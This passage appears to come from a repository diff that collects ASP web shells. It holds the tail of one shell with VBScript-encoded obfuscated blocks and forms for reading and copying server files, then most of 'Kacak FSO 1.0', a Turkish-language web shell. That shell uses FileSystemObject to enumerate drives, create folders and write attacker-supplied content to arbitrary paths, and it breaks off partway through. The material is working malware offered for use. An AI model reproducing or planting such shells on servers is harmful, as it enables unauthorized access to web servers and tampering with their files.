document.write('<font face="'+fontface+'" size="'+fontsize+'" color="'+typingbasecolor+'">')
|
||||
for (m=0;m<message.length;m++)
|
||||
document.write('<span id="typinglight">'+message.charAt(m)+'</span>')
|
||||
document.write('</font>')
|
||||
var tempref=document.all.typinglight
|
||||
}
|
||||
else
|
||||
document.write(message)
|
||||
function typing(){
|
||||
if (n==0){
|
||||
for (m=0;m<message.length;m++)
|
||||
tempref[m].style.color=typingbasecolor
|
||||
}
|
||||
tempref[n].style.color=typingtextcolor
|
||||
if (n<tempref.length-1)
|
||||
n++
|
||||
else{
|
||||
n=0
|
||||
clearInterval(blinking)
|
||||
setTimeout("starttyping()",1500)
|
||||
return
|
||||
}
|
||||
}
|
||||
function starttyping(){
|
||||
if (document.all)
|
||||
blinking=setInterval("typing()",blinkspeed)
|
||||
}
|
||||
starttyping()
|
||||
</script>
|
||||
<form action="?Gonder" method="post">
|
||||
<center><table>
|
||||
<td>Nerden :<td><input type="text" name="nerden" size=25 value=index.html></td>
|
||||
<td><input type="submit" onclick="submit()" value="Veriyi Gönder"></td><tr>
|
||||
<td>Nereye :<td><input type="text" name="nereye" size=25></td><td><input type="reset" onclick="reset" value=" Temizle "></td><tr>
|
||||
</form>
|
||||
<form action="?oku" method="post">
|
||||
<td><font color=pink>Oku :</font><td><input type="text" name="klasor" size=25 value=<%=#@~^LQAAAA==.;;/DR/D7nD7l.km4snk`JzKnd{n_ejq;bd{KbPur#kQ8AAA==^#~@%>></td><td><input type="submit" onclick="submit()" value=" Veriyi Oku "></td><tr>
|
||||
</form>
|
||||
</table><br>
|
||||
<a href="javascript:void(0);" onclick="javascript:Start ('?hakkinda');">
|
||||
Script Hakkýnda </a> - <a href="javascript:void(0);" onclick="javascript:Start ('?kullanim');">Kullaným Bilgileri </a>- <a href="javascript:void(0);" onclick="javascript:Start ('?copy');">Copright</a> -<a href="javascript:void(0);" onclick="javascript:Start ('?linkler');"> Linkler</a>
|
||||
<br><br><br>
|
||||
<hr color=lime width=50%>
|
||||
<%#@~^VA4AAA==n N~kE(@#@&EO RO ORO ORR OO RO O@#@&d;4,mm/nF@#@&Kx~+M.WMP.nkE:n~ +aY@#@& +.9+ P',D5E/OR6W.hvJx.NxJ*@#@&xDXnPx~M+5EdYc0G.s`JUnM+z+rb@#@&jY,EYbVk~',?nD7+. ;D+mO+}4L^O`rHU/RPGKVdJ*@#@&b0~nMDP@!@*,!~Y4n P@#@&D/wKxknRSDrYPE@!1+xDnD@*Cb:)~),JL+.D [/^Db2YbWU'r@!z^n YnD@*E@#@&n^/@#@&M+k2W /nRSDrOPJÝþ^n:bxk.~$lþmDý^ýJ@#@&nU9Pr0@#@&EDksdcnDG^/dsK.sPUDX+BP nD9+U@#@&DndaWxknRSDkDn~J@!mxO+.@*@!4.@*@!WWM:~C1YkGU{g~:O4W[{wK/Y@*@!bUw!Y~YHwnxkE4srY,\l^;n'rJz1)Pj)Is)Jr~/bynxWc@*@!&6W.:@*E@#@&@#@&+ NPkE(@#@&EORO ORR OO RO OO RRO@#@&kE8P^Ck++@#@&Gx,+..KDP.nkEh+,U6O@#@&0VlkWM~',Dn;!+dOc0WMh`r3VmdGDr#@#@&j+O~K4%C:Pn,'~jD\n.cZ.+mOr8N+1Y`rHb^DK/G0DRp\dCK:KJ*@#@&bW~P WDPnD.~{PTPD4+ P@#@&M+/2G /nRS.bYn,J@!m+ Y.@*_bPb,)~EL+DM N/mMr2YbW [E@!^n YnD@*E@#@&+U[,k0@#@&K4%C:PhR6a+ PJV2:E~,JE[0VCdKD[rE~,0l^dn@#@&W(LuKPKc?nx9@#@&0W[smDPx~k+.\.ctOsVAxmKNcW(LuK:n ]/wKU/K+XOb@#@&D/2WUdRADbO+,J@!WKxY~^KVGD{A4kOPkky'l@*@!1+UYD@*~ P.A]ÝSAIP ~@!4M@*@!mnxOnM@*@!YaYmDnC,/Yzs'vhb[DtlO!uitkT4Y=&X!pB@*EL3W9slM[J@!&O+XYmDnl@*E@#@&.+k2W /n SDkOn,J@!4M@*@!0GM:,lmDkKU'QPh+DtG[{wWkO@*@!kxa;OPDXa+x/;8skOP7CV!+xErb1)~UbeszErPdby'cW@*@!&0KDh@*r@#@&n NPk;4@#@&B RRO O ORORR ORO RO @#@&d!4P^Ck+f@#@&./2Kxk+RSDbO+,JE[1\W'rJ@#@&.+kwW dnRSDbYnPEELY;/LEJ@#@&nU9P/;8@#@&vO R OR O OO O RO ORO @#@&d!4P1C/c@#@&.n/aW /nRA.bYnPrE[0Essmxkh'rJ@#@&MnkwG /RhMkDnPrJ'Y!/'Er@#@&UN,/E(@#@&B O ORORR ORO RO ORR O@#@&d!4~mmd*@#@&D/wKxknRSDrYPEELmWaz[rJ@#@&.n/aW /nRA.bYnPrE[DEd'rJ@#@&n N~/!8@#@&v O OO O RO ORO ORR OO@#@&/!4P1Cd++@#@&Dn/2G /nRS.kD+~Er[SrU0VnDLEr@#@&M+kwW / hMkO+,JE'DE/LEJ@#@&+ [~/!4@#@&vORR ORO RO ORR OORR O@#@&k;(P^m/G@#@&DdwKxd+ch.rD+Pr@!Vb@*ÝV0~ÖUmPnE.4CUý PjkDn/bxn~zY:CV,kçrx,8bD~bx9+6,tm"ýD^lzýxc@!sr@*?Yc~k N+Xn.Pmx9P.+C[D~?1.kaYrUbxPeC ýxCPIüV^+zbxc@!Vb@*UGxMl~k Nna,Alkýsl1l3,drYX^+~lzUý,/nD7nD9lU~kkYn~mVýUPJ~wDnVDPbçk ~h4dls4C~bN+ms@!^k@*Grz+^ksP)NChý PjkDn/bPW.+tGdDFfRSn(/Cs4mRmK:Jhl4:;Y,/r"9+PSn4kl:(C[l P6Dn+4GkYq&cA+(/Ch(lR^Gszhl4d!x~9kH+4bD,z+MPCV9ýðýxý"ý~7lDkCXmVý:@!sr@*UY,kUNnaD~l [PM+C[DPd^Mk2YbUbPWM+tWkY8fRS+8/m:8CcmWs&:mt/!U&k N6nD Ckw~ob8k,XüVsNkUr.R@!Vb@*_l"ýMVmNýðýxý.PbUN6rNPCz ýPX.+,lYDýUý"R@!Vb@*Þr:[r,MnV9rPnE.8mxl~r Nn6b~mYhmXmP/DPbUN6nD,lU[,D+m[+MP/1.rwDk NnP@!WKxOP1GVKDx2bx3@*HD[+ @!J0G Y@*PXmymUPH+.+,lOC1lðý:ý.~k N+Xrhk.k PCNýUý~Hl"ýXK.E.Rcr N+a 4YhV,Lb4r*@!^k@*@!0KUY,mGVKDx2bx3@*H+M+X@!&0KxD@*~|ýdhý l~Ý/~b9lhýU,+8~nlslkö.ü,4r.NxP(k.r:,3slköD[n P4b~l^YP9r"k NPGV[;ð!Prçk ~RczhC4:EO&bx[+X 4Yh,XmyýXKD!"P(E.Nm3r~bxNaR4Y:,C[lsýx,/rYndbx[+0rPbx[nXB+~LöM+~NðrþbD~s+k+VmP9n0mEsYcld2,0k^Cx9lPKsC4bVbD @!sr@*.nDbzk,MöU[DPP;þ!xCP~CkYýðýhý.NmPb9ls~Ýx9+ak,XnhbþPr^;XKDR@!sr@*~E,kþs+h[P@!0KUY,mGsKD'2r 3@*r0;@!zWKxD@*P0ý/sý~AKþPFl^l^C0R@!^r@*zDYý0~ul^l,bUVChmNýz/mUýy,)~hmkV8Gs4@$tKOslr^R1W:,~,4W^X[+sWU@$4WYsCk^RmKh~~,hSh /CUmVO+MGDcW.L,/kOnsk"NU,\n,/bY+,l9hk P&PsW[smDýx9Cx,XlM[ýhPmVm4rVr.kkUk. Pr@#@&./wGUk+ hMrD+~rJLYEk[rE@#@&+UN,/;8@#@&B RO OO RRO O ORORR OR@#@&dE(P^Ck+%@#@&M+dwKUk+ SDbY+,J@!8D@*@!8D@*@!^n Y+M@*A!P/1.rwDPt+4Nr~:l.l6ýUNmx~jcKP)[ý l~5m"ý^:ýþOýMR@!4D@*ÜmMnY^k~.PÜ^.Y/b"Pz/w,uG/DVmDýUPPühü NnPÇmsýþýDcR@!8M@*b[./~?mOýMýPFýk:ý lPnW9;x!P!öDü Yüsns+3,ÝdYNkðbUry,fK/zlUýU,b[ýxý,zl.ýx @!4D@*P6OlMnmP$ö^ü:ü,2ð+MP~Gþ/mPulDl~#mDPGn:3Yb. @!(D@*|;D8C ýx~fKdXmVC.ý ýPMö.üUDüVnX8bVh3,Ýçkx,bHUýPU+.\D[n,rVsCxý.PSm"ýhP_N9Pol.VYh+. R,@!8.@*bN.nkPFý/sýUmPPm:,.+Mk,!kMkskMPcö. )P9l-S+4'Csk1l -[+WC!VORmdw@!4.@*@!Vk@*HVnD,emwC(k^kDb:@!8D@*?rYNnVbPk ^V!N+^n.k,Ym3rw~n9+.+0~b9:rU,nlUn^kU+,i^lþhm@!(D@*zNsrx,ÞkWD/rUbPÇl^hl@!4D@*jn/kkKx~.n~;WG3bnPG+ðn.^+Dr~ÇmVCDmV,SGTk Pr^:m@!4M@*jkD+snMkx,#+MkP:C8l VmDýUýPÝU[bDh+,-/cR E@#@&DndaWU/ SDrD+,JJLY!d[rJ@#@&x[~kE4@#@&B OO RRO O ORORR ORO R@#@&WVIEAA==^#~@%>
|
||||
</table>
|
||||
<%#@~^CQAAAA==d!4~kYHV+mwMAAA==^#~@%>
|
||||
<style>body{margin:0px;font-style:normal;font-size:10px;color:#FFFFFF;font-family:Verdana,Arial;background-color:#3a3a3a;scrollbar-face-color: #303030;scrollbar-highlight-color: #5d5d5d;scrollbar-shadow-color: #121212;scrollbar-3dlight-color: #3a3a3a;scrollbar-arrow-color: #9d9d9d;scrollbar-track-color: #3a3a3a;scrollbar-darkshadow-color: #3a3a3a;}.k1{font-family:Wingdings; font-size:15px;}.k2{font-family:Webdings; font-size:15px;}td{font-style:normal;font-size:10px;color:#FFFFFF;font-family:Verdana,Arial;}a{color:#EEEEEE;text-decoration:none;}a:hover{color:#40a0ec;}a:visited{color:#EEEEEE;}a:visited:hover{color:#40a0ec;}input,.kbrtm,select{background:#303030;color:#FFFFFF;font-family:Verdana,Arial;font-size:10px;vertical-align:middle; height:18; border-left:1px solid #5d5d5d; border-right:1px solid #121212; border-bottom:1px solid #121212; border-top:1px solid #5d5d5d;}textarea{background:#121212;color:#FFFFFF;font-family:Verdana,Arial;font-size:10px;vertical-align:middle; height:18; border-left:1px solid #121212; border-right:1px solid #5d5d5d; border-bottom:1px solid #5d5d5d; border-top:1px solid #121212;}</style>
|
||||
<%#@~^BwAAAA==n N~kE(oQIAAA==^#~@%>
|
899
xakep-shells/ASP/kacak.asp.txt
Normal file
899
xakep-shells/ASP/kacak.asp.txt
Normal file
|
@ -0,0 +1,899 @@
|
|||
<html>
|
||||
<head>
|
||||
<meta http-equiv="Content-Language" content="tr">
|
||||
<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
|
||||
<meta name="ProgId" content="FrontPage.Editor.Document">
|
||||
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
|
||||
<title>Kacak FSO 1.0 | Terrorist Crew - Saldiri.Org</title>
|
||||
</head>
|
||||
|
||||
<body topmargin="0" leftmargin="0" bgcolor="#EAEAEA">
|
||||
|
||||
<script language="JavaScript">
|
||||
<!--
|
||||
function MM_openBrWindow(theURL,winName,features) { //v2.0
|
||||
window.open(theURL,winName,features);
|
||||
}
|
||||
//-->
|
||||
</script>
|
||||
|
||||
<%
|
||||
if request.querystring("TGH") = "1" then
|
||||
on error resume next
|
||||
es=request.querystring("Kacak")
|
||||
diez=server.urlencode(left(es,(instrRev(es,"\"))-1))
|
||||
|
||||
Select case es
|
||||
case "C:" diez="C:"
|
||||
case "D:" diez="D:"
|
||||
end select
|
||||
|
||||
|
||||
|
||||
|
||||
%>
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<body topmargin="0" leftmargin="0"
|
||||
onLoad="location.href='?klas=<%=diez%>&usak=1'">
|
||||
|
||||
<%
|
||||
else
|
||||
%>
|
||||
|
||||
|
||||
|
||||
<%
|
||||
if request.querystring("Dosyakaydet") <> "" then
|
||||
set kaydospos=createobject("scripting.filesystemobject")
|
||||
set kaydoses=kaydospos.createtextfile(request.querystring("dosyakaydet") & request("dosadi"))
|
||||
set kaydoses=nothing
|
||||
set kaydospos=nothing
|
||||
set kaydospos=createobject("scripting.filesystemobject")
|
||||
set kaydoses=kaydospos.opentextfile(request.querystring("dosyakaydet") & request("dosadi"), 2, true)
|
||||
kaydoses.write request("duzenx")
|
||||
set kaydoses=nothing
|
||||
set kaydospos=nothing
|
||||
end if
|
||||
%>
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<%
|
||||
if request.querystring("yenidosya") <> "" then
|
||||
%>
|
||||
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
|
||||
<tr>
|
||||
<td width="70" bgcolor="#000000" height="76">
|
||||
<p align="center">
|
||||
<img border="0" src="http://img509.imageshack.us/img509/2842/spartaqt5.jpg"></td>
|
||||
<td width="501" bgcolor="#000000" height="76" valign="top">
|
||||
<font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
|
||||
<span style="font-weight: 700">
|
||||
<br>
|
||||
Kacak ©<br>
|
||||
</span>Terrorist Crew<br>
|
||||
<span style="font-weight: 700">
|
||||
<br>
|
||||
KACAK FSO 1.0</span></font></td>
|
||||
<td width="431" bgcolor="#000000" height="76" valign="top">
|
||||
<p align="right"><span style="font-weight: 700">
|
||||
<font face="Verdana" color="#858585" style="font-size: 2pt"><br>
|
||||
</font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
|
||||
<a href="www.kacaq.blogspot.com" style="text-decoration: none">
|
||||
<font color="#858585">GrayHatz ~ TurkGuvenligi.Ýnfo</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585"> <br>
|
||||
</font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
|
||||
<a href="mailto:BuqX@hotmail.com" style="text-decoration: none">
|
||||
<font color="#858585">BuqX</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:BuqX@hotmail.com" style="text-decoration: none"><font color="#858585">@GrayHatz ~ TurkGuvenligi.Ýnfo</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585"> </font></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td width="1004" height="1" bgcolor="#9F9F9F" colspan="3">
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
|
||||
<tr>
|
||||
<td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
|
||||
<span style="font-size: 8pt"> Çalýþýlan Klasör</span></font></td>
|
||||
<td bgcolor="#D6D6D6" height="20">
|
||||
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
|
||||
<tr>
|
||||
<td width="1"></td>
|
||||
<td><font face="Verdana" style="font-size: 8pt"> <%=response.write(request.querystring("yenidosya"))%></font></td>
|
||||
<td width="65">
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
|
||||
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1">
|
||||
<tr>
|
||||
<td width="100%" bgcolor="#000000"> </td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td width="100%" bgcolor="#B7B7B7">
|
||||
<form method="POST" action="?dosyakaydet=<%=request.querystring("yenidosya")%>&klas=<%=request.querystring("yenidosya")%>" name="kaypos">
|
||||
<p align="center"><b><font size="1" face="Verdana">
|
||||
<br>
|
||||
Dosya Adý : <br>
|
||||
</font>
|
||||
</b><font
|
||||
color="#FFFFFF" size="1" face="Arial">
|
||||
<input
|
||||
type="text" size="97" maxlength="32"
|
||||
name="dosadi" value="Dosya Adý"
|
||||
class="search"
|
||||
onblur="if (this.value == '') this.value = 'Kullanýcý'"
|
||||
onfocus="if (this.value == 'Kullanýcý') this.value=''"
|
||||
style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"><br>
|
||||
<br>
|
||||
</font>
|
||||
<b><font size="1" face="Verdana">
|
||||
Ýçerik : <br>
|
||||
</font>
|
||||
<font face="Verdana, Arial, Helvetica, sans-serif" size="2" color="#000000" bgcolor="Red">
|
||||
<textarea name="duzenx"
|
||||
style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: left"
|
||||
|
||||
|
||||
rows="24" cols="95" wrap="OFF"><%=sedx%></textarea></font><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
|
||||
<br>
|
||||
</font></b>
|
||||
<span class="gensmall">
|
||||
<input type="submit" size="16"
|
||||
name="duzenx1" value="Oluþtur"
|
||||
style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
|
||||
</span></p>
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber19">
|
||||
<tr>
|
||||
<td width="100%" align="right" bgcolor="#000000">
|
||||
<p align="center">
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</form>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td width="100%" bgcolor="#EAEAEA">
|
||||
<p align="right">
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
|
||||
|
||||
<%
|
||||
else
|
||||
%>
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<%
|
||||
if request.querystring("klasorac") <> "" then
|
||||
|
||||
set doses=createobject("scripting.filesystemobject")
|
||||
set es=doses.createfolder(request.querystring("aktifklas") & request("duzenx"))
|
||||
set es=nothing
|
||||
set doses=nothing
|
||||
|
||||
|
||||
end if
|
||||
%>
|
||||
|
||||
<%
|
||||
if request.querystring("klasac") <> "" then
|
||||
|
||||
set aktifklas=request.querystring("aktifklas")
|
||||
|
||||
|
||||
%>
|
||||
<td width="65" bgcolor="#000000" height="76">
|
||||
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber25" height="59">
|
||||
<tr>
|
||||
<td width="70" bgcolor="#000000" height="76">
|
||||
<p align="center">
|
||||
<img border="0" src="http://img509.imageshack.us/img509/2842/spartaqt5.jpg"></td>
|
||||
<td width="501" bgcolor="#000000" height="76" valign="top">
|
||||
<font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
|
||||
<span style="font-weight: 700">
|
||||
<br>
|
||||
<center>Kacak ©<br>
|
||||
</span>Terrorist Crew<br>
|
||||
<span style="font-weight: 700">
|
||||
<br>
|
||||
KACAK FSO 1.0</span></font></td>
|
||||
<td width="431" bgcolor="#000000" height="76" valign="top">
|
||||
<p align="right"><span style="font-weight: 700">
|
||||
<font face="Verdana" color="#858585" style="font-size: 2pt"><br>
|
||||
</font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
|
||||
<a href="www.kacaq.blogspot.com" style="text-decoration: none">
|
||||
<font color="#858585">GrayHatz ~ TurkGuvenligi.Ýnfo</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585"> <br>
|
||||
</font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
|
||||
<a href="mailto:BuqX@hotmail.com" style="text-decoration: none">
|
||||
<font color="#858585">BuqX</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:BuqX@hootmail.com" style="text-decoration: none"><font color="#858585">@Hotmail.com</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585"> </font></td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
|
||||
<tr>
|
||||
<td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
|
||||
<span style="font-size: 8pt"> Çalýþýlan Alan</span></font></td>
|
||||
<td bgcolor="#D6D6D6" height="20">
|
||||
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
|
||||
<tr>
|
||||
<td width="1"></td>
|
||||
<td><font face="Verdana" style="font-size: 8pt"> <%=aktifklas%></font></td>
|
||||
<td width="65">
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
|
||||
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="174">
|
||||
<tr>
|
||||
<td width="100%" bgcolor="#000000" height="19"> </td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td width="100%" bgcolor="#C5C5C5" height="134">
|
||||
<form method="POST" action="?klasorac=1&aktifklas=<%=aktifklas%>&klas=<%=aktifklas%>" name="klaspos">
|
||||
<p align="center"><font
|
||||
color="#FFFFFF" size="1" face="Arial">
|
||||
<input
|
||||
type="text" size="37" maxlength="32"
|
||||
name="duzenx" value="Klasör Adý"
|
||||
class="search"
|
||||
onblur="if (this.value == '') this.value = 'Kullanýcý'"
|
||||
onfocus="if (this.value == 'Kullanýcý') this.value=''"
|
||||
style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center">
|
||||
<br>
|
||||
<br>
|
||||
<br>
|
||||
</font>
|
||||
<span class="gensmall">
|
||||
<input type="submit" size="16"
|
||||
name="duzenx1" value="Oluþtur"
|
||||
style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
|
||||
</span></span><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
|
||||
</font></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td width="100%" bgcolor="#000000" height="19"> </td>
|
||||
</tr>
|
||||
<tr>
|
||||
|
||||
|
||||
<%
|
||||
else
|
||||
%>
|
||||
|
||||
|
||||
|
||||
<%
|
||||
if request.querystring("suruculer") <> "" then
|
||||
%>
|
||||
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
|
||||
<tr>
|
||||
<td width="70" bgcolor="#000000" height="76">
|
||||
<p align="center">
|
||||
<img border="0" src="http://img509.imageshack.us/img509/2842/spartaqt5.jpg"></td>
|
||||
<td width="501" bgcolor="#000000" height="76" valign="top">
|
||||
<font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
|
||||
<span style="font-weight: 700">
|
||||
<br>
|
||||
Kacak ©<br>
|
||||
</span>Terrorist Crew<br>
|
||||
<span style="font-weight: 700">
|
||||
<br>
|
||||
KACAK FSO 1.0</span></font></td>
|
||||
<td width="431" bgcolor="#000000" height="76" valign="top">
|
||||
<p align="right"><span style="font-weight: 700">
|
||||
<font face="Verdana" color="#858585" style="font-size: 2pt"><br>
|
||||
</font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
|
||||
<a href="www.kacaq.blogspot.com" style="text-decoration: none">
|
||||
<font color="#858585">www.kacaq.blogspot.com</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585"> <br>
|
||||
</font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
|
||||
<a href="mailto:BuqX@hotmail.com" style="text-decoration: none">
|
||||
<font color="#858585">BuqX</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:BuqX@hootmail.com" style="text-decoration: none"><font color="#858585">@Hotmail.com</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585"> </font></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td width="1004" height="1" bgcolor="#9F9F9F" colspan="3">
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="4">
|
||||
<tr>
|
||||
<td width="110" bgcolor="#9F9F9F" height="4">
|
||||
<span style="font-size: 2pt"> </span></td>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="153">
|
||||
<tr>
|
||||
<td width="100%" height="19" bgcolor="#000000"> </td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td width="100%" height="113" bgcolor="#E1E1E1"> <div align="center">
|
||||
<center>
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="484" id="AutoNumber2" height="17">
|
||||
<tr>
|
||||
<td width="208" height="17" align="center" bgcolor="#C5C5C5">
|
||||
<font face="Verdana" style="font-size: 8pt">Sürücü Adý</font></td>
|
||||
<td width="75" height="17" align="center" bgcolor="#C5C5C5">
|
||||
<font face="Verdana" style="font-size: 8pt">Boyutu</font></td>
|
||||
<td width="75" height="17" align="center" bgcolor="#C5C5C5">
|
||||
<font face="Verdana" style="font-size: 8pt">Boþ Alan</font></td>
|
||||
<td width="64" height="17" align="center" bgcolor="#C5C5C5">
|
||||
<font face="Verdana" style="font-size: 8pt">Durum</font></td>
|
||||
<td width="62" height="17" align="center" bgcolor="#C5C5C5">
|
||||
<font face="Verdana" style="font-size: 8pt">Ýþlem</font></td>
|
||||
</tr>
|
||||
</table>
|
||||
</center>
|
||||
</div>
|
||||
<div align="center">
|
||||
<center>
|
||||
|
||||
|
||||
<%
|
||||
set klassis =server.createobject("scripting.filesystemobject")
|
||||
set klasdri=klassis.drives
|
||||
%>
|
||||
|
||||
<%
|
||||
for each dongu in klasdri
|
||||
%>
|
||||
|
||||
<%
|
||||
if dongu.driveletter <> "A" then
|
||||
if dongu.isready=true then
|
||||
%>
|
||||
|
||||
<%
|
||||
select case dongu.drivetype
|
||||
case 0 teype="Diðer"
|
||||
case 1 teype="Taþýnýr"
|
||||
case 2 teype="HDD"
|
||||
case 3 teype="NetWork"
|
||||
case 4 teype="CD-Rom"
|
||||
case 5 teype="FlashMem"
|
||||
end select
|
||||
%>
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="484" id="AutoNumber3" height="17">
|
||||
<tr>
|
||||
<td width="208" height="17" align="left" bgcolor="#EEEEEE">
|
||||
<font face="Verdana" style="font-size: 8pt"> <%=dongu.driveletter%>:\ ( <%=dongu.filesystem%> )</font></td>
|
||||
<td width="75" height="17" align="center" bgcolor="#E0E0E0">
|
||||
<font face="Verdana" style="font-size: 8pt"><%=Round(dongu.totalsize/(1024*1024),1)%> MB</font></td>
|
||||
<td width="75" height="17" align="center" bgcolor="#E0E0E0">
|
||||
<font face="Verdana" style="font-size: 8pt"><%=Round(dongu.availablespace/(1024*1024),1)%> MB</font></td>
|
||||
<td width="64" height="17" align="center" bgcolor="#E0E0E0">
|
||||
<font face="Verdana" style="font-size: 8pt"><%=teype%> </font></td>
|
||||
<td width="62" height="17" align="center" bgcolor="#E0E0E0">
|
||||
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber24">
|
||||
<tr>
|
||||
<td width="62" height="17" align="center" bgcolor="#E0E0E0"
|
||||
onmouseover="this.style.background='#A0A0A0'"
|
||||
onmouseout="this.style.background='#E0E0E0'"
|
||||
style="CURSOR: hand"
|
||||
|
||||
>
|
||||
<a href="?klas=<%=dongu.driveletter%>:\" style="text-decoration: none">
|
||||
<font face="Verdana" style="font-size: 8pt" color="#000000">Gir</font></a></td>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
<%
|
||||
end if
|
||||
end if
|
||||
%>
|
||||
<%
|
||||
next
|
||||
%>
|
||||
|
||||
|
||||
|
||||
</center>
|
||||
</div>
|
||||
<div align="center">
|
||||
<center>
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="484" id="AutoNumber4" height="4">
|
||||
<tr>
|
||||
<td width="484" height="4" align="center" bgcolor="#C5C5C5">
|
||||
<span style="font-size: 2pt"> </span></td>
|
||||
</tr>
|
||||
</table>
|
||||
</center>
|
||||
</div>
|
||||
<p> </p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td width="100%" height="19" bgcolor="#000000"> </td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<%
|
||||
else
|
||||
%>
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<%
|
||||
if request.querystring("kaydet") <> "" then
